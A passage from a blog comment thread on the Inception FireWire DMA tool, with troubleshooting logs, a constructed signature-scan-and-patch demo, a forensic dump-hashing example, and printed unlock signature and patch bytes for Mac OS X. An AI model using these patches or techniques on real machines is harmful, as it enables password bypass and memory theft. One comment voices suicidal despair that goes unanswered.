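    for a page that cannot be read (e.g. a device-mapped range, an assumption
    for this example); such pages are skipped instead of aborting the scan.
    Returns a list of (physical_address, target)."""
    hits = []
    for page_no in range(start_page, num_pages):
        try:
            page = read_page(page_no)
        except OSError:
            continue
        for target in targets:
            off = target["offset"]
            end = off + len(target["signature"])
            if end <= PAGESIZE and page[off:end] == target["signature"]:
                hits.append((page_no * PAGESIZE + off, target))
    return hits


def patch_page(page, target):
    """Return a copy of a matched page with the patch applied at
    offset + patch_offset; the caller keeps the original as a backup."""
    off = target["offset"] + target["patch_offset"]
    return page[:off] + target["patch"] + page[off + len(target["patch"]):]


def make_demo_memory(pages=8, hit_page=5, decoy_page=2):
    """Constructed 'physical memory': filler bytes, the signature at its
    correct in-page offset in hit_page, and the same bytes one byte off in
    decoy_page, which an offset-anchored scan must NOT report."""
    mem = bytearray([0x90]) * (pages * PAGESIZE)
    sig, off = DEMO_TARGET["signature"], DEMO_TARGET["offset"]
    base = hit_page * PAGESIZE + off
    mem[base:base + len(sig)] = sig
    base = decoy_page * PAGESIZE + off + 1
    mem[base:base + len(sig)] = sig
    return mem


def demo(unreadable_page=3):
    """Scan the constructed memory, patch the hit in place, and return
    (hits, memory) so the result can be inspected."""
    mem = make_demo_memory()

    def read_page(n):
        if n == unreadable_page:  # simulated page the bus cannot read
            raise OSError("simulated I/O timeout")
        return bytes(mem[n * PAGESIZE:(n + 1) * PAGESIZE])

    hits = find_signatures(read_page, len(mem) // PAGESIZE, [DEMO_TARGET])
    for address, target in hits:
        page_no = address // PAGESIZE
        backup = read_page(page_no)  # keep for restoring after the attack
        mem[page_no * PAGESIZE:(page_no + 1) * PAGESIZE] = patch_page(backup, target)
    return hits, mem


if __name__ == "__main__":
    for address, target in demo()[0]:
        print("%s found at 0x%x in page %d" % (target["name"], address, address // PAGESIZE))
```

The decoy page shows why the offset anchor matters: the same ten bytes one position off are ignored, whereas a plain sequential byte search would report them. The unreadable page models the device-mapped regions discussed further down the thread: skip and continue rather than abort.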
  48. Max

    Hi Carsten, I'm trying to install Inception on OS X, and after installing it, when I try to run it I get this error:
    ImportError: cannot import name firewire

    Traceback (most recent call last):
    File "./incept", line 27, in
    from inception import firewire, screenlock, memdump, pickpocket, cfg, util, term
    File "/opt/local/src/inception/inception/screenlock.py", line 24, in
    from inception import firewire, cfg, sound, util, term
    ImportError: cannot import name firewire

    Thanks in advance for your help

    Reply
    • Sebastian

      @Max: this means your forensic1394 package is not installed properly. After building it, go to the /forensic1394/python dir and do a "sudo python3 setup.py install".

      The OS X installation instructions are pretty bad :(

      Reply
  49. James

    Since you are able to use this to attack a machine with a Thunderbolt port by using a Thunderbolt/FW adapter, why would it not work using a Thunderbolt-to-Thunderbolt cable? It seems that the victim machine is already "speaking" Thunderbolt.

    Reply
  50. crabbies

    Can this attack work if both machines only have ExpressCard slots? If so, what cable would be used? I presume it would still work, as it is still direct access?

    Reply
  51. LipAir

    Hello, I have installed Inception on an iMac (10.8) and connected it to my Win7. My hard disk D: is locked with BitLocker;

    Last login: Mon Feb 25 20:19:43 on ttys000
    /Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept ; exit;
    LipAirs-iMac:~ LipAir$ /Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept ; exit;
    Traceback (most recent call last):
    File "/Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept", line 27, in
    from inception import firewire, screenlock, memdump, pickpocket, cfg, util, term
    File "/Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/inception/firewire.py", line 33, in
    from forensic1394.bus import Bus
    File "/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/__init__.py", line 1, in
    from .bus import Bus
    File "/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/bus.py", line 25, in
    from forensic1394.functions import forensic1394_alloc, forensic1394_destroy, \
    File "/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/functions.py", line 32, in
    raise ImportError
    ImportError
    logout

    can you help me??

    thx
    LipAir

    Reply
  52. Frank Luo

    I have a laptop encrypted with BitLocker but lost the key. Is it possible for me to use Inception to get the recovery key?

    Reply
  53. Paul

    Attacking Windows 8 x64 failed. I analyzed the dumped memory of the victim; the signature+offset seem to match the values in cfg.py. It's weird... any hint?

    Reply
  54. Josh

    Is there a way to use the tool to extract the entire 4 GB memory region? Will that crash the target because of mapped PCI regions?

    Reply
  55. Ruslan

    Hello everyone.
    First of all, thanks to Carsten for the great tool.
    The main reason for my post is addressed to the people having troubles with "no firewire device found".
    I have experimented with the tool long enough and found the following:
    If you have fw in lspci, if you have firewire_ohci, firewire_sbp2 in lsdev and still have "no firewire device found" – change the cable. 95% is a cable trouble, even if it worked just a day before. It sounds strange, but I have triple-checked that fact, using several cables, connecting to three different PCs with different fw cards – and I'm sure. My first cable worked just fine for a week or so, but one day the tool stopped working, giving the annoying error. I killed about four days inspecting all kinds of software reasons, because I thought it wasn't the hardware. Then, at last, I tried to change the cable – and it worked for a couple of times. It was a sad surprise when the new cable stopped working again. I bought three different cables and at last found the one which works perfectly. So, if you are expecting troubles, I suggest the very first thing – if you have the possibility to use a 6-pin to 6-pin cable – make or buy a 6-pin cable with only 4 pins connected: 3 to 5, 5 to 3, 4 to 6, and 6 to 4. 1 and 2 should not be connected. This is the only cable that always works. Sorry for possible mistakes, I'm not a native English speaker.

    Reply
    • Carsten

      This is a very good point. I'll create a link to the Amazon products I know work 100 % of the time for me.

      In my experience as well, the cable is at fault 95 % of the time.

      Reply
  56. Fritz

    Hi, Inception seems not to work when booting Windows in "Safe Mode" (via F8). Working in Safe Mode would be an interesting feature, given that some device control management solutions are not configured for, or even don't work in, safe mode. Will there be an update so that Inception will work in safe mode as well?

    Thanks very much & kind regards!

    Fritz.

    Reply
  57. Jeroen

    Problem with Mac OS 10.6.8. Log:

    root@loeniks:/opt/inception# ./incept -v

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [*] FireWire devices on the bus (names may appear blank):
    —————————————————————————————————————————————–
    [1] Vendor (ID): Apple Computer, Inc. (0xa27) | Product (ID): Macintosh (0xa)
    —————————————————————————————————————————————–
    [*] Only one device present, device auto-selected as target
    [*] Selected device: Apple Computer, Inc.
    [*] Available targets (known signatures):
    —————————————————————————————————————————————–
    [1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
    [6] Ubuntu: libpam unlock/privilege escalation
    [7] Linux Mint: libpam unlock/privilege escalation
    —————————————————————————————————————————————–
    [?] Please select target (or enter ‘q’ to quit): 5
    [*] Selected target: Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
    [*] The target module contains the following signatures:
    —————————————————————————————————————————————–
    Versions: 10.6.4, 10.6.8, 10.7.3, 10.8.2
    Architectures: x86, x64

    Offsets: 0x7cf
    Signature: 0x41bff6c8ffff48c78588
    Patch: 0x41bf0000000048c78588
    Patch offset: 0x0

    Offsets: 0xbff
    Signature: 0x41bff6c8ffff
    Patch: 0x41bf00000000
    Patch offset: 0x0

    Offsets: 0x82f
    Signature: 0xc78580f6fffff6c8ffff
    Patch: 0xc78580f6ffff00000000
    Patch offset: 0x0

    Offsets: 0xfa7
    Signature: 0xfb689d8eb0231c04883c4785b415c415d415e415f5dc3
    Patch: 0x31dbffc3
    Patch offset: 0x0

    Offsets: 0x334
    Signature: 0x88d84883c4685b415c415d415e415f5d
    Patch: 0xb001
    Patch offset: 0x0
    —————————————————————————————————————————————–
    [|] Initializing bus and enabling SBP-2, please wait 1 seconds or press Ctrl+C
    [*] DMA shields should be down by now. Attacking…
    [==> ] 309 MiB ( 8%) {000075b2498934fc}
    [*] Signature found at 0x13573bff in page no. 79219
    [!] Um, something went wrong: forensic1394_read_device_v: Bad I/O request size
    —————————————————————————————————————————————–
    Traceback (most recent call last):
    File "./incept", line 200, in main
    address, page = screenlock.attack(targets)
    File "/opt/inception/inception/screenlock.py", line 303, in attack
    success, backup = patch(device, address, chunks)
    File "/opt/inception/inception/screenlock.py", line 133, in patch
    backup = device.read(address, cfg.PAGESIZE)
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/device.py", line 48, in newf
    return f(self, *args, **kwargs)
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/device.py", line 158, in read
    self._readreq(list(zip(addrs, lens)), buf)
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/device.py", line 134, in _readreq
    forensic1394_read_device_v(self, creq, len(creq))
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/errors.py", line 61, in process_result
    raise IOError(err)
    IOError: forensic1394_read_device_v: Bad I/O request size
    —————————————————————————————————————————————–
    root@loeniks:/opt/inception#

    Reply
  58. Jeroen

    Problem with pickpocket mode. Log:

    root@loeniks:/opt/inception# ./incept -v --pickpocket

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [!] Um, something went wrong: 'module' object has no attribute 'wrapper'
    —————————————————————————————————————————————–
    Traceback (most recent call last):
    File "./incept", line 198, in main
    pickpocket.lurk()
    File "/opt/inception/inception/pickpocket.py", line 37, in lurk
    s = '\n'.join(term.wrapper.wrap('[-] Lurking in the shrubbery ' +
    AttributeError: 'module' object has no attribute 'wrapper'
    —————————————————————————————————————————————–

    Fix: change line 37 in pickpocket.py to:

    s = '\n[-] Lurking in the shrubbery, waiting for a device to connect, Ctrl-C to abort\r'

    Reply
  59. Jeroen

    Problem with reading ~3+ GiB of memory. Happens in all modes. Inception aborts, and the target system may or may not freeze. Same problem on both Apple hw (tested on 10.6, 10.7, 10.8) and a Windows PC (tested on 7 x64). Attacker is Ubuntu 12.04.02 LTS x64. The problem happens with both the integrated and an ExpressCard interface. Log:

    root@loeniks:/opt/inception# ./incept -v --pickpocket

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [-] Lurking in the shrubbery, waiting for a device to connect, Ctrl-C to abort
    [*] FireWire device detected
    [*] Dumping from 0x100000 to 0x100000000, a total of 4095 MiB
    [*] FireWire devices on the bus (names may appear blank):
    —————————————————————————————————————————————–
    [1] Vendor (ID): Apple Computer, Inc. (0xa27) | Product (ID): Macintosh (0xa)
    —————————————————————————————————————————————–
    [*] Only one device present, device auto-selected as target
    [*] Selected device: Apple Computer, Inc.
    [-] Initializing bus and enabling SBP-2, please wait 1 seconds or press Ctrl+C
    [!] Um, something went wrong: forensic1394_read_device_v: I/O timeoutffffffffff}
    —————————————————————————————————————————————–
    Traceback (most recent call last):
    File "./incept", line 198, in main
    pickpocket.lurk()
    File "/opt/inception/inception/pickpocket.py", line 51, in lurk
    memdump.dump(start, end)
    File "/opt/inception/inception/memdump.py", line 81, in dump
    data = device.read(i, requestsize)
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/device.py", line 48, in newf
    return f(self, *args, **kwargs)
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/device.py", line 158, in read
    self._readreq(list(zip(addrs, lens)), buf)
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/device.py", line 134, in _readreq
    forensic1394_read_device_v(self, creq, len(creq))
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/errors.py", line 61, in process_result
    raise IOError(err)
    IOError: forensic1394_read_device_v: I/O timeout
    —————————————————————————————————————————————–
    root@loeniks:/opt/inception#

    Any clues about how to debug this issue? Thx!

    Reply
  60. Tommy

    Hardware-embedded encryption of the drive is much faster than OS encryption and prevents DMA. Did you know that the NSA just finished building a humongous new super Q-bit data crypto-analysis computer complex and that it just went online last September 2012 (Wired magazine article "Inside the Matrix", April 2012 issue)? Mr Control Freak just used your American tax dollars to fund the electric anal probe to rape the world with. Our privacy is now finally completely F**ked to H**l. The saddest part of this is that I don't think they're smart enough to realize that this same technology will someday be used against them also.

    Reply
  61. Georgy

    Hi
    I’ve ordered the relevant FireWire pci-e card. While I’m waiting for it to arrive, could you tell me:
    Will this work running inception in a Debian 7 VM?
    Or does it need to run from the host?
    Thanks
    Georgy

    Reply
  62. Mr Schmeg

    Is FireWire broken in Ubuntu now? Having the same error on many machines: Ubuntu 12.04 LTS, Mint etc ...
    ubuntu@ubuntu:~/inception$ sudo ./incept

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [?] FireWire modules are not loaded (or insufficient privileges). Try loading
    them? [Y/n]:
    [!] Could not initialize FireWire. Are the modules loaded into the kernel?
    [!] Attack unsuccessful

    Reply
  63. crackruckles

    Just got your tool installed on my Raspberry Pi and that went fine. I have it attached to a USB-to-FireWire cable but I get the error "firewire modules not loaded". Any ideas?

    Reply
  65. Watzmann

    Awesome tool. It worked for me on an Apple 10.8.4, attacking a Windows XP machine over 1394, with McAfee FW and encryption. Now I am able to recover my personal, private data. Will donate. Thank you very much.

    Reply
  66. Sam

    Hi, looks really interesting

    Can this be used to set up a serial console on Linux systems to capture kernel panic stack traces?

    I want to do this on a machine that's panicking every couple of days; it has no RS232 at all.

    Reply
  67. Pooper

    I'm a nice guy. This shit is making me suicidal. I don't get you people. I'm literally going to just give up on people and end this shit.. and I was on your side too

    Reply
  68. Rena

    You’re on Hacker News. Better late than never?

    What a nice protocol Firewire is to just give you direct access to physical memory. So kind of it.

    Reply
  69. Kurt H Hanssen

    Hi Carsten,
    Talked with you today about issues with MacBook Air and MacBook Pro from 2012 and newer.

    Have tested Inception against a whole bunch of MacBook Air/Pro, old ones and new. When I came to machines newer than mid 2012, it is not possible to read anything from the memory of the target machine. Have tried both the patching method and --pickpocket.

    As an attacker machine, I have tried both Ubuntu 12.10 installed on a PC and on a Mac (not using virtualization).

    The newer MacBook Air/Pro only have Thunderbolt, but I'm using the original Apple Thunderbolt -> FireWire adapter.

    Have had success attacking a 2011 MacBook Air through Thunderbolt w/adapter, but not two different MB Airs from 2012 and 2013 and a MB Pro from mid 2012.

    On all target machines, the juju FireWire stack shows up, even on the newer MB Pro/Air, so I know the machine is recognized. They are also recognized by Inception as Apple computers.

    I think there must be some sort of shield on the newer MB Pro/Air.

    Have even tried to shadow the attacker machine behind a Thunderbolt disk, but with the same result:
    forensic1394_read_device_v: I/O Timeout

    Have also tried the forensic1394 libraries manually through Python3, and these machines are all identified, possible to attach, but no reading. I think I had one success reading just a few kilobytes with some tweaking of start/length.

    Reply
    • Carsten

      Hi Kurt. This is interesting. Would it be possible for me to get in touch with you to test this on your HW?

      Also – for anybody else reading this – are you experiencing the same issues?

      Reply
      • Kurt H Hanssen

        Hi Carsten
        Yes, I'm in Oslo from Mon 3 to Thu 6 March.
        I have the machines available for you and we could have a look at these issues. Just let me know. I'll send you an SMS.

        Kurt

        Reply
  70. Chris Taylor

    I think this tool is excellent and have been testing it as a method of conducting live computer forensics on a suspect’s machine. I think one way this could be improved would be to add a hashing feature in order to verify the integrity of the RAM image, therefore helping to make the image admissible as evidence.

    Chris

    Reply
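Three questions in this thread point at the same piece of tooling: whether the whole 4 GiB window can be dumped without the target crashing on mapped device regions, why a dump that hits an I/O timeout aborts outright, and how to hash a RAM image so its integrity can be verified later. The Python below is an added example addressing all three, not Inception's code: a chunked dump that degrades to page-sized reads on error, fills unreadable pages with zeros so physical offsets stay aligned, records the gaps, and hashes every chunk plus the whole image. The device class (FakeDmaDevice), its synthetic memory contents, the unreadable range, the chunk size and the function names (dump_memory, verify_image, demo) are constructed for this example; the error string only imitates the forensic1394 message quoted in the thread.

```python
import hashlib
import io

PAGESIZE = 0x1000


class FakeDmaDevice:
    """Constructed stand-in for a DMA read interface: read(addr, size) returns
    bytes of a synthetic memory image and raises OSError for any request that
    overlaps a range declared unreadable, modelling a bus timeout on
    device-mapped or otherwise inaccessible physical addresses."""

    def __init__(self, size, bad_ranges):
        self._mem = bytes((i * 7 + 3) & 0xFF for i in range(size))
        self._bad = bad_ranges

    def read(self, addr, size):
        for lo, hi in self._bad:
            if addr < hi and addr + size > lo:
                raise OSError("forensic1394_read_device_v: I/O timeout")
        return self._mem[addr:addr + size]


def dump_memory(device, start, end, requestsize, out):
    """Read [start, end) in requestsize chunks and write them to `out`.
    A chunk that fails is retried one page at a time; pages that still fail
    are written as zeros and recorded as gaps, so the image keeps its size
    and file offsets still map to physical addresses.  Every chunk is hashed
    as it is written; the manifest and whole-image SHA-256 are returned."""
    chunks, gaps = [], []
    whole = hashlib.sha256()
    for addr in range(start, end, requestsize):
        size = min(requestsize, end - addr)
        try:
            data = device.read(addr, size)
        except OSError:
            pieces = bytearray()
            for paddr in range(addr, addr + size, PAGESIZE):
                psize = min(PAGESIZE, addr + size - paddr)
                try:
                    pieces += device.read(paddr, psize)
                except OSError:
                    pieces += bytes(psize)          # zero-fill, keep alignment
                    gaps.append((paddr, psize))
            data = bytes(pieces)
        out.write(data)
        whole.update(data)
        chunks.append((addr, size, hashlib.sha256(data).hexdigest()))
    return {"chunks": chunks, "gaps": gaps, "sha256": whole.hexdigest()}


def verify_image(image, manifest, start):
    """Re-hash a saved image against its manifest; returns the addresses of
    chunks whose contents no longer match (an empty list means intact)."""
    bad = []
    for addr, size, digest in manifest["chunks"]:
        off = addr - start
        if hashlib.sha256(image[off:off + size]).hexdigest() != digest:
            bad.append(addr)
    return bad


def demo():
    """Dump a 64-page synthetic image whose pages 20 and 21 are unreadable,
    using 8-page requests; returns (manifest, image bytes)."""
    device = FakeDmaDevice(64 * PAGESIZE, bad_ranges=[(20 * PAGESIZE, 22 * PAGESIZE)])
    out = io.BytesIO()
    manifest = dump_memory(device, 0, 64 * PAGESIZE, 8 * PAGESIZE, out)
    return manifest, out.getvalue()


if __name__ == "__main__":
    manifest, image = demo()
    print("image sha256:", manifest["sha256"])
    print("gaps:", ["0x%x+0x%x" % g for g in manifest["gaps"]])
```

The manifest, not just the final hash, is what matters for evidence handling: it records which physical ranges were never read, and because DMA over FireWire is not an atomic snapshot (as noted later in this thread), a per-chunk hash lets a reviewer say which chunks were captured intact even when the image as a whole cannot be treated as a single consistent copy.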
  71. jk

    I understand that a native or PCI FireWire port is needed at the target system, but is it necessarily needed at the host?
    And would a FireWire-USB adapter work if it was connected to a USB ExpressCard?
    (And I had to write trash into the website label since it didn't want me to post a comment otherwise.)

    Reply
  72. Heinz Kreft

    Hi Carsten,
    Your Inception tool is a great proof of concept of how difficult it would be to establish good protection for unsafe platforms, and is also an excellent demonstration of your personal capabilities ...

    My reason here is to put an idea on the table that I've had in my head for a long time, and so far I have not found such a thing on the Internet. I would like to ask you and the people here what they think about it.

    I call this currently non-existent tool "ICT RipCord". It should help to make PCs a little bit safer against DMA & cold boot attacks in the following way:

    A small system service on the PC (e.g. Windows, OS X) and an app on a smartphone (iOS, Android) work together as a "dead man's switch". They establish a VPC using (at install time) self-generated root certificates (no dependence on any third party) with Perfect Forward Secrecy (OTP session keys established by the Diffie-Hellman protocol (DHP)). This channel is then used for a simple "ping-pong protocol" to make sure that everything is OK. If the protected PC is not able to get a valid answer within a preset timeframe, the PC fails safe: the service stops the system, (optionally) zeros the RAM and forces the PC to go down (forgetting the affected memory keys).

    This can limit the timeframe for an attacker having physical control over the victim PC to capture the key in memory.

    If the owner of the authentication token (the smartphone with the auth app) detects that his PC is stolen, under attack or even forgotten to be switched off, he simply turns off the authentication service. There is no big issue if this tool downs the PC in the case the network goes down, because the legal owner of the PC is in general able to enter the key of the previously installed full disk encryption system.

    I am interested to hear pros and cons about this.
    Thanks a lot,

    Heinz

    Reply
  73. Andy

    Hey, this tool really is cool :-)
    I will use this tool to silence some of the loud-mouthed guys here claiming that encrypting a PC without activating PBA is enough security ...

    Something I noticed: Using Ubuntu 12.4 LTS with all required stuff added to attack a McAfee EEPC-encrypted Win7-64 Enterprise system.

    The attack works fine for the first attempt (PBA is passed, Win7 boots up, user logs in the regular way, screen is locked); unlocking the screen is possible w/o password.
    When in this same session the screen is then locked again using WIN-L, the next attack fails (at around 29xx MiB – the system has 4 GB) with some FireWire I/O error.

    Any specific reason for that?

    After the system has been rebooted and a user logs in the regular way, and then locks the screen, the attack works again. Not really an issue, as one would expect an attacker NOT to lock the screen :-)
    Only, assuming that the screen saver hits during e.g. copying the data off the attacked PC, it can't be unlocked again, which can be annoying. (No, one can't disable the screen saver if the settings are done via GPO.)

    Thanks,
    Andy

    Reply
  74. Andy

    Hi Carsten,

    (Somehow the sort order of these posts is screwed up?! It's not ordered by date ...)

    To protect a PC, one needs to know what a potential attacker needs to know or have, so: as I understood this tool, to log on to the victim PC (assuming a Windows system to be attacked), an existing and valid local user account is always required?!

    I tried the following (all on Win7-64 as victim, joined into an AD domain):
    - System booted and domain account logged in, screen locked, network connected: Works, can unlock w/o password.
    - Same system, screen locked again: Won't work, FireWire I/O error!
    - System booted, but nobody logged on, using the last logged-on domain account, network connected: Nope, no way!
    Tool says OK, but can't log on. Seems the code to verify a domain account is not patched.
    - System booted, nobody logged on, using the last logged-on domain account, NO network connected: Works, can log on w/o password.
    - Same system, user logged off, same user logged on again: Still works, can log on again, no need to re-run the tool.
    - System booted, nobody logged on, using an arbitrary local account: No way, unknown user!

    That means: A potential attacker always needs to know a valid local computer account (or a valid domain account that has cached credentials) on the victim. If the local administrator is renamed (or disabled, and/or no local user is known or does exist – any idea here?), it is impossible to log on. If the last logged-on user is not displayed and no user is known – impossible to log on (after using Inception).

    To achieve this, Windows can be set to not display the last logged-on user, and the local accounts can be renamed or deleted/disabled.

    I therefore would say: If an attacker has no clue which account is valid to log on, there's no way to get in?!
    Anybody disagree? Did I miss anything?

    Is there a way to locate a valid user account / cached credentials in the memory dump without knowing it beforehand?

    (Carsten, let me know if you want some more things tested …)

    Regards,
    Andy

    Reply
  81. Andrea

    Hello,

    I tested Inception on Windows 7 32- and 64-bit with SP0 and SP1 and it isn't working. :(

    Please, can you test this system?

    Thank you.

    Reply
  82. Giovani

    Hi Carsten,

    first of all, thanks for your excellent tool! However I’ve got some trouble with my recently installed PCIe controller. The DMA attack works without any problems. But the memory analysis shows that the dumpfile is broken.

    Attacker: Ubu 12.04.3 native 1394
    Victim: Win7SP1x64 4GB RAM 1394 on PCIe_x1
    Tool: Volatility 2.3.1

    Reply
    • Carsten

      DMA access over FireWire is not atomic unfortunately, so currently there’s no fix for this as volatility expects an atomic memory copy.

      Reply
  83. ysminnpu

    is it possible to detect the windows version before attack? this can save attacking time because we only need to search specific signatures for that windows version.

    Reply
  84. Andrea

    Hello,

    I tested the unlock-password attack of Inception on Windows 7 32- and 64-bit with SP0 and SP1 and it isn't working. :(

    Please, can you test this system?

    Thank you.

    Reply
  85. Anders Karlsson

    Inception v.0.3.5 no longer finds any signature after patching my Windows 7. Winver version is: 7601 SP1, version of msv1_0.dll is: 6.1.7601.22616
    It has worked before until recent patches. How do I find the new signature?

    Reply
  86. lockedbits

    After some updates BitLocker doesn't let me boot into Win8.1 anymore because "winload.efi" was modified and I am forced to enter the recovery key now... the recovery key is saved in KeePass on the encrypted drive... is there any way to bypass that recovery key menu with Inception? The notebook has no FireWire so I have to put the HDD in another computer and buy a PCIe FW card – don't know if this could work because of the TPM chip?

    Reply
  87. Sir.Costy

    Can the Inception tool unlock and escalate privileges if you are already logged in? I mean, after entering the user account? Or does it only work when the logon window is shown at the beginning?

    Reply
  91. bravoxy

    Hi guys!
    I have a Windows 8.1 64-bit OS with full disk encryption. It is not possible to log on to the computer. The only local admin password is forgotten. The tool successfully dumped the whole memory but is not able to find the signature for Win 8.1... Has anybody already made a signature for Win 8.1 64-bit? Thx. Any tool that can search for the BitLocker recovery key in the memory dump? (For Win 8.1, 64-bit.) Thx

    Reply
  92. attis

    Hello,
    Based on Bravoxy's problem, I've made a direct DLL patch (W8.1 x64) with NOPs – it lets you in with any password. Still needs tests through FireWire to find the proper addressing.

    Reply
  93. John McCash

    Hi,
    This tool is really awesome. One thing I wish for, though, is the ability to run it from an inconspicuous mobile device of some kind. A 3rd generation iPod would be ideal, and I actually have one, but it appears that the most recent iPodLinux uses an older kernel than is supported by Inception. Do you know of any way to get Inception working on this platform (I did see what appeared to be some references on google to later kernels on this device, but no specific instructions) or else any other small mobile device that has a Firewire or other supported Inception interface?
    Thanks much
    John

    Reply
  94. John McCash

    One other possibility that occurs to me is that somebody could do a custom firmware for a wireless PC card of some kind that would allow Inception to be run from any 802.1-enabled host against the system into which it is inserted. Know whether anyone might be working on anything like that? The same trick would, of course, work with other types of PC card.
    Thanks
    John

    Reply
  95. Carsten

    I don't know if anybody is working on something like this. Running Inception on an iPod would require you to get a newer kernel to run on it first, unfortunately.

    Reply
